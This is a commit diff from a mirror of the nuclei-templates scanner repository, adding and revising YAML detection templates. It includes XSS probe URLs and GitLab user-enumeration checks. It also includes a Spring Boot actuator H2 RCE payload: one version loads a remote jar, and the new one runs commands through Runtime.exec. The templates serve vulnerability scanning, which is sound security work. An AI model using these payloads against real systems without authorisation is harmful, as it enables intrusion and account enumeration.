daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into token-spray-fix

patch-1
sandeep 2021-11-03 15:43:53 +05:30
parent dc81d63630 dac6028b7e
commit 0f99f285d3
25 changed files with 456 additions and 53 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
.github/ISSUE_TEMPLATE/false-negative.md vendored Normal file
View File

@ -0,0 +1,21 @@
---
name: False Negative
about: 'Issue for template missing valid/expected result.'
labels: 'false-negative'
---
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
### Nuclei Version:
<!-- You can find current version of nuclei with "nuclei -version" -->
### Template file:
<!-- Template producing false-negative results, for example: "cves/XX/XX.yaml" -->
### Command to reproduce:
<!-- Please include the command to replicate the behavior so fix can be applied asap. -->
<!-- if host information can not be shared publicly, please reach out to us on discord server in DM -->

2
.github/ISSUE_TEMPLATE/false-positive.md vendored
View File

@ -1,6 +1,6 @@
---
name: False Positive
about: 'Issue for template producing false positive results.'
about: 'Issue for template producing invalid/unexpected result.'
labels: 'false-positive'
---

18
cves/2016/CVE-2016-6210.yaml
View File

@ -1,15 +1,16 @@
id: CVE-2016-6210
info:
name: OpenSSH 5.3 Detection
author: iamthefrogy
name: OpenSSH username enumeration < v7.3
author: iamthefrogy,forgedhallpass
severity: medium
tags: network,openssh
description: OpenSSH 5.3 is vulnerable to username enumeration and DoS vulnerabilities.
description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities.
reference:
- http://seclists.org/fulldisclosure/2016/Jul/51
- https://security-tracker.debian.org/tracker/CVE-2016-6210
- http://openwall.com/lists/oss-security/2016/08/01/2
- https://nvd.nist.gov/vuln/detail/CVE-2016-6210
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.9
@ -21,6 +22,11 @@ network:
- "{{Hostname}}"
- "{{Hostname}}:22"
matchers:
- type: word
words:
- "SSH-2.0-OpenSSH_5.3"
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-2][^\d][^\r]+)'
extractors:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_[^\r]+'

8
cves/2018/CVE-2018-15473.yaml
View File

@ -1,8 +1,8 @@
id: CVE-2018-15473
info:
name: OpenSSH Username Enumeration
author: r3dg33k,daffainfo
name: OpenSSH Username Enumeration <= v7.7
author: r3dg33k,daffainfo,forgedhallpass
severity: medium
description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
@ -21,9 +21,9 @@ network:
matchers:
- type: regex
regex:
- 'SSH-2.0-OpenSSH_[1-7]'
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)'
extractors:
- type: regex
regex:
- 'SSH-2.0-OpenSSH_([0-9.]+)'
- '(?i)SSH-2.0-OpenSSH_[^\r]+'

36
cves/2018/CVE-2018-18570.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2018-18570
info:
name: Cross-Site Scripting on Planon web application
author: emadshanab
severity: medium
description: Planon before Live Build 41 has XSS
reference:
- https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-18570
tags: xss,cve,cve2018,planon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2018-18570
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header

39
cves/2021/CVE-2021-38704.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2021-38704
info:
name: ClinicCases 7.3.3 Reflected Cross-Site Scripting (XSS)
author: alph4byt3
severity: medium
description: Multiple reflected cross-site scripting (XSS) vulnerabilities in ClinicCases 7.3.3 allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft.
reference:
- https://github.com/sudonoodle/CVE-2021-38704
- https://nvd.nist.gov/vuln/detail/CVE-2021-38704
metadata:
shodan-query: http.title:"ClinicCases",html:"/cliniccases/"
tags: xss,cve,cve2021,cliniccases
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-38704
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

17
file/keys/branch-key.yaml Normal file
View File

@ -0,0 +1,17 @@
id: branch-key
info:
name: Branch.io Live Key
author: 0xh7ml
severity: info
reference: https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74
tags: token,file
file:
- extensions:
- all
extractors:
- type: regex
regex:
- "key_live_.{32}"

33
file/logs/django-framework-exceptions.yaml Normal file
View File

@ -0,0 +1,33 @@
id: django-framework-exceptions
info:
name: Django Framework Exceptions
description: Detects suspicious Django web application framework exceptions that could indicate exploitation attempts
author: geeknik
reference:
- https://docs.djangoproject.com/en/1.11/ref/exceptions/
- https://docs.djangoproject.com/en/1.11/topics/logging/#django-security
severity: medium
tags: file,logs,django
file:
- extensions:
- all
extractors:
- type: regex
name: exception
part: body
regex:
- 'SuspiciousOperation'
- 'DisallowedHost'
- 'DisallowedModelAdminLookup'
- 'DisallowedModelAdminToField'
- 'DisallowedRedirect'
- 'InvalidSessionKey'
- 'RequestDataTooBig'
- 'SuspiciousFileOperation'
- 'SuspiciousMultipartForm'
- 'SuspiciousSession'
- 'TooManyFieldsSent'
- 'PermissionDenied'

23
file/logs/python-app-sql-exceptions.yaml Normal file
View File

@ -0,0 +1,23 @@
id: python-app-sql-exceptions
info:
name: Python App SQL Exception Check
description: Generic check for SQL exceptions in Python according to PEP 249
reference: https://www.python.org/dev
author: geeknik
severity: medium
tags: file,logs,python,sql
file:
- extensions:
- all
extractors:
- type: regex
name: exception
part: body
regex:
- 'DataError'
- 'IntegrityError'
- 'ProgrammingError'
- 'OperationalError'

28
file/logs/ruby-on-rails-framework-exceptions.yaml Normal file
View File

@ -0,0 +1,28 @@
id: ruby-on-rails-framework-exceptions
info:
name: Ruby on Rails Framework Exceptions
description: Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts
author: geeknik
reference:
- http://edgeguides.rubyonrails.org/security.html
- http://guides.rubyonrails.org/action_controller_overview.html
- https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception
- https://github.com/rails/rails/blob/master/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb
severity: medium
tags: file,logs,ruby,rails
file:
- extensions:
- all
extractors:
- type: regex
name: exception
part: body
regex:
- 'ActionController\:\:InvalidAuthenticityToken'
- 'ActionController::InvalidCrossOriginRequest'
- 'ActionController::MethodNotAllowed'
- 'ActionController::BadRequest'
- 'ActionController::ParameterMissing'

27
file/logs/spring-framework-exceptions.yaml Normal file
View File

@ -0,0 +1,27 @@
id: spring-framework-exceptions
info:
name: Spring Framework Exceptions
description: Detects suspicious Spring framework exceptions that could indicate exploitation attempts
author: geeknik
reference:
- https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html
severity: medium
tags: file,logs,spring
file:
- extensions:
- all
extractors:
- type: regex
name: exception
part: body
regex:
- 'AccessDeniedException'
- 'CsrfException'
- 'InvalidCsrfTokenException'
- 'MissingCsrfTokenException'
- 'CookieTheftException'
- 'InvalidCookieException'
- 'RequestRejectedException'

38
file/logs/suspicious-sql-error-messages.yaml Normal file
View File

@ -0,0 +1,38 @@
id: suspicious-sql-error-messages
info:
name: Suspicious SQL Error Messages
description: Detects SQL error messages that indicate probing for an injection attack
author: geeknik
severity: high
tags: file,logs,sql
file:
- extensions:
- all
extractors:
- type: regex
name: oracle
part: body
regex:
- 'quoted string not properly terminated'
- type: regex
name: mysql
part: body
regex:
- 'You have an error in your SQL syntax'
- type: regex
name: sql_server
part: body
regex:
- 'Unclosed quotation mark'
- type: regex
name: sqlite
part: body
regex:
- 'near \"\*\"\: syntax error'
- 'SELECTs to the left and right of UNION do not have the same number of result columns'

6
miscellaneous/detect-dns-over-https.yaml
View File

@ -21,11 +21,13 @@ requests:
- type: status
status:
- 200
- type: word
part: header
words:
- "application/dns-message"
part: header
- type: regex
part: header
regex:
- "(C|c)ontent-(L|l)ength: 49"
part: header

8
vulnerabilities/gitlab/gitlab-user-open-api.yaml → misconfiguration/gitlab/gitlab-api-user-enum.yaml
View File

@ -1,11 +1,11 @@
id: gitlab-user-open-api
id: gitlab-api-user-enum
info:
author: Suman_Kar
name: GitLab - User Information Disclosure Via Open API
severity: medium
tags: gitlab,disclosure
reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158
tags: gitlab,enum,misconfig
requests:
- raw:
@ -15,19 +15,19 @@ requests:
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
threads: 50
payloads:
uid: helpers/wordlists/numbers.txt
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
condition: and
regex:
- "username.*"
- "id.*"
- "name.*"
condition: and
- type: word
part: header

10
misconfiguration/gitlab/gitlab-user-enumeration.yaml → misconfiguration/gitlab/gitlab-graphql-user-enum.yaml
View File

@ -1,10 +1,10 @@
id: gitlab-user-enumeration
id: gitlab-graphql-user-enum
info:
name: Gitlab User enumeration
name: Gitlab User enumeration via Graphql API
author: pikpikcu
severity: info
tags: gitlab,enumeration
tags: gitlab,enum,misconfig
requests:
- method: POST
@ -21,16 +21,16 @@ requests:
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/json"
part: header
- type: word
condition: and
words:
- avatarUrl
- username
- email
condition: and
- type: status
status:

2
misconfiguration/gitlab/gitlab-public-repos.yaml
View File

@ -4,7 +4,7 @@ info:
name: GitLab public repositories
author: ldionmarcil
severity: info
tags: gitlab
tags: gitlab,exposure,misconfig
reference:
- https://twitter.com/ldionmarcil/status/1370052344562470922
- https://github.com/ldionmarcil/gitlab-unauth-parser

7
misconfiguration/gitlab/gitlab-public-signup.yaml
View File

@ -1,9 +1,10 @@
id: gitlab-public-signup
info:
name: GitLab public signup
author: pdteam
severity: info
tags: gitlab
tags: gitlab,misconfig
requests:
- method: GET
@ -26,6 +27,6 @@ requests:
- 200
- type: word
negative: true
words:
- '<meta content="GitLab.com" property="og:description">'
negative: true
- '<meta content="GitLab.com" property="og:description">'

7
misconfiguration/gitlab/gitlab-public-snippets.yaml
View File

@ -1,9 +1,10 @@
id: gitlab-public-snippets
info:
name: GitLab public snippets
author: pdteam
severity: info
tags: gitlab
tags: gitlab,exposure,misconfig
reference:
- https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10
- https://twitter.com/intigriti/status/1375078783338876929
@ -23,10 +24,10 @@ requests:
- type: status
status:
- 200
- type: word
negative: true
condition: or
words:
- "No snippets found"
- "Nothing here."
negative: true
part: body

11
vulnerabilities/gitlab/gitlab-user-enumeration.yaml → misconfiguration/gitlab/gitlab-user-enum.yaml
View File

@ -1,14 +1,13 @@
id: gitlab-user-enumeration
id: gitlab-user-enum
info:
author: Suman_Kar
name: GitLab - User Enumeration
severity: info
tags: gitlab,enumeration
reference: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/malenames-usa-top1000.txt
tags: gitlab,enum,misconfig
requests:
- raw:
- |
GET /users/{{user}}/exists HTTP/1.1
@ -16,10 +15,10 @@ requests:
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
threads: 50
payloads:
user: helpers/wordlists/user-list.txt
stop-at-first-match: true
matchers-condition: and
matchers:
@ -33,6 +32,6 @@ requests:
- 200
- type: word
part: header
words:
- "application/json"
part: header
- "application/json"

29
technologies/apache/default-apache-test-all.yaml Normal file
View File

@ -0,0 +1,29 @@
id: default-apache-test-all
info:
name: Apache HTTP Server Test Page
author: andydoering
description: Detects default installations of apache (not just apache2 or installations on CentOS)
severity: info
tags: tech,apache
metadata:
shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works"
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers:
- type: regex # type of the extractor
part: body # part of the response (header,body,all)
condition: or
regex:
- "<title>.*?Apache(|\\d+) .*?(Default|Test).*?</title>"
- "<title>(Default|Test).*? Apache(|\\d+).*?</title>"
extractors:
- type: kval
part: header
kval:
- server

22
technologies/default-detect-generic.yaml Normal file
View File

@ -0,0 +1,22 @@
id: default-detect-generic
info:
name: Default Web Application Detection
author: andydoering
description: Catch-all for detecting default installations of web applications using common phrases found in default install pages
severity: info
tags: tech
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: body
condition: or
words:
- "<title>Default</title>"
- "<title>Welcome to</title>"

28
token-spray/api-iconfinder.yaml Normal file
View File

@ -0,0 +1,28 @@
id: api-iconfinder
info:
name: IconFinder API Test
author: daffainfo
severity: info
reference:
- https://developer.iconfinder.com/reference/overview-1
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/IconFinder.md
tags: token-spray,iconfinder
self-contained: true
requests:
- raw:
- |
GET https://api.iconfinder.com/v4/icons/search?query=arrow&count=10 HTTP/1.1
Host: api.iconfinder.com
Accept: application/json
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- '"icons":'
- '"is_icon_glyph":'
- '"download_url":'
condition: and

34
token-spray/api-micro-user-service.yaml Normal file
View File

@ -0,0 +1,34 @@
id: api-micro-user-service
info:
name: Micro User Service API Test
author: daffainfo
severity: info
reference:
- https://m3o.com/user
- https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Micro%20User%20Service.md
tags: token-spray,micro-user-service
self-contained: true
requests:
- raw:
- |
POST https://api.m3o.com/v1/user/Read HTTP/1.1
Host: api.m3o.com
Content-Type: application/json
Authorization: Bearer {{token}}
Content-Length: 21
{
"id": "usrid-1"
}
matchers:
- type: word
part: body
words:
- '"username":'
- '"email":'
- '"created":'
- '"updated":'
condition: and

33
vulnerabilities/springboot/springboot-h2-db-rce.yaml
View File

@ -5,36 +5,33 @@ info:
author: dwisiswant0
severity: critical
tags: springboot,rce
# Payload taken from @pyn3rd (Twitter), see reference[2].
reference:
- https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database
- https://twitter.com/pyn3rd/status/1305151887964946432
- https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
- https://github.com/spaceraccoon/spring-boot-actuator-h2-rce
metadata:
shodan-query: http.favicon.hash:116323821
requests:
- method: POST
path:
- "{{BaseURL}}/actuator/env"
headers:
Content-Type: "application/json"
body: |
{
"name": "spring.datasource.hikari.connection-init-sql",
"value":"CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName(\"pop\", true, new URLClassLoader(new URL[]{new URL(\"http://127.0.0.1:9001/pop.jar\")})).newInstance();return null;}$$; CALL remoteUrl()"
}
- raw:
- |
POST /actuator/env HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"name":"spring.datasource.hikari.connection-test-query",
"value":"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('whoami');"
}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "\"spring.datasource.hikari.connection-init-sql\":\""
condition: and
part: body
- type: word
words:
- "application/vnd.spring-boot.actuator"
part: header
- '"spring.datasource.hikari.connection-test-query":"CREATE ALIAS EXEC AS CONCAT'

22
workflows/default-application-workflow.yaml Normal file
View File

@ -0,0 +1,22 @@
id: default-application-workflow
info:
name: Default Web Application Detection
author: andydoering
description: Detects default installations of web applications
workflows:
- template: technologies/apache/default-apache-test-all.yaml
- template: technologies/apache/xampp-default-page.yaml
- template: technologies/microsoft/default-iis7-page.yaml
- template: technologies/microsoft/default-windows-server-page.yaml
- template: technologies/microsoft/default-microsoft-azure-page.yaml
- template: technologies/default-asp-net-page.yaml
- template: technologies/nginx/default-nginx-page.yaml
- template: technologies/lighttpd-default.yaml
- template: technologies/default-django-page.yaml
- template: exposures/files/drupal-install.yaml
- template: technologies/oracle/default-oracle-application-page.yaml
- template: technologies/ibm/ibm-http-server.yaml
- template: technologies/lighttpd-default.yaml
- template: technologies/default-detect-generic.yaml